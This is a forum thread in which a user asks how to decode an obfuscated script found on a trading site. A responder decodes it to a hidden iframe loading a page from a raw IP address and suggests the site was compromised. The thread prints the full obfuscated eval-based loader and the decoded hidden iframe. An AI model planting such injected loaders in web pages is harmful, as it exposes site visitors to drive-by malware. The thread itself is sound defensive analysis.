How to decode suspicious script?

[HowlingWulf]

I noticed this at a site I trade with, but I can't figure out how to decode it. Should I stop the trade even though I don't know what this does? It seems overly obfuscated to me.

Code:

 <script>try{q=document.createElement("div");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='qgode'["substr"](4-2);w=this;e=w[f["substr"](11)+zz];n="3.5#3.5#51.5#50#15#19#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#19.5#60.5#5.5#3.5#3.5#3.5#51.5#50#56#47.5#53.5#49.5#56#19#19.5#28.5#5.5#3.5#3.5#61.5#15#49.5#53#56.5#49.5#15#60.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#58.5#56#51.5#57#49.5#19#16#29#51.5#50#56#47.5#53.5#49.5#15#56.5#56#48.5#29.5#18.5#51#57#57#55#28#22.5#22.5#27.5#25#22#26.5#25.5#22#24#24.5#25#22#24#25#25#22.5#25#25.5#26#23.5#24#26.5#26.5#26.5#22#51#57#53.5#53#18.5#15#58.5#51.5#49#57#51#29.5#18.5#23.5#23#18.5#15#51#49.5#51.5#50.5#51#57#29.5#18.5#23.5#23#18.5#15#56.5#57#59.5#53#49.5#29.5#18.5#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#28#51#51.5#49#49#49.5#54#28.5#55#54.5#56.5#51.5#57#51.5#54.5#54#28#47.5#48#56.5#54.5#53#57.5#57#49.5#28.5#53#49.5#50#57#28#23#28.5#57#54.5#55#28#23#28.5#18.5#30#29#22.5#51.5#50#56#47.5#53.5#49.5#30#16#19.5#28.5#5.5#3.5#3.5#61.5#5.5#3.5#3.5#50#57.5#54#48.5#57#51.5#54.5#54#15#51.5#50#56#47.5#53.5#49.5#56#19#19.5#60.5#5.5#3.5#3.5#3.5#58#47.5#56#15#50#15#29.5#15#49#54.5#48.5#57.5#53.5#49.5#54#57#22#48.5#56#49.5#47.5#57#49.5#33.5#53#49.5#53.5#49.5#54#57#19#18.5#51.5#50#56#47.5#53.5#49.5#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#56.5#56#48.5#18.5#21#18.5#51#57#57#55#28#22.5#22.5#27.5#25#22#26.5#25.5#22#24#24.5#25#22#24#25#25#22.5#25#25.5#26#23.5#24#26.5#26.5#26.5#22#51#57#53.5#53#18.5#19.5#28.5#50#22#56.5#57#59.5#53#49.5#22#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#29.5#18.5#51#51.5#49#49#49.5#54#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#55#54.5#56.5#51.5#57#51.5#54.5#54#29.5#18.5#47.5#48#56.5#54.5#53#57.5#57#49.5#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#53#49.5#50#57#29.5#18.5#23#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#57#54.5#55#29.5#18.5#23#18.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#58.5#51.5#49#57#51#18.5#21#18.5#23.5#23#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#51#49.5#51.5#50.5#51#57#18.5#21#18.5#23.5#23#18.5#19.5#28.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#22#47.5#55#55#49.5#54#49#32.5#51#51.5#53#49#19#50#19.5#28.5#5.5#3.5#3.5#61.5"[((e)?"s":"")+"p"+"lit"]("a#"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-577!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}</script>

[cd34]

Code:

<iframe src="http://94.75.234.244/45612777.html" style="visibility: hidden; position: absolute; left: 0px; top: 0px;" height="10" width="10"></iframe>

The iframe uses an IP address rather than a domain, points to a server at leaseweb, however, the url 404s. The fact that it is an iframe, is hidden, and served with obfuscated code suggests something isn't right. However, you might contact the webmaster and ask what it is for. It is likely his site has been compromised and the code has been added without his knowledge.

(Firefox, View Generated Source from the Web Developers Toolkit)

[HowlingWulf]

Thanks cd!

I searched for Web Developers Toolkit for firefox but only found a reference to a 7 add-on collection.

[cd34]

http://livehttpheaders.mozdev.org/
http://chrispederick.com/work/web-developer/

these are probably the two handiest for tracking down things like this.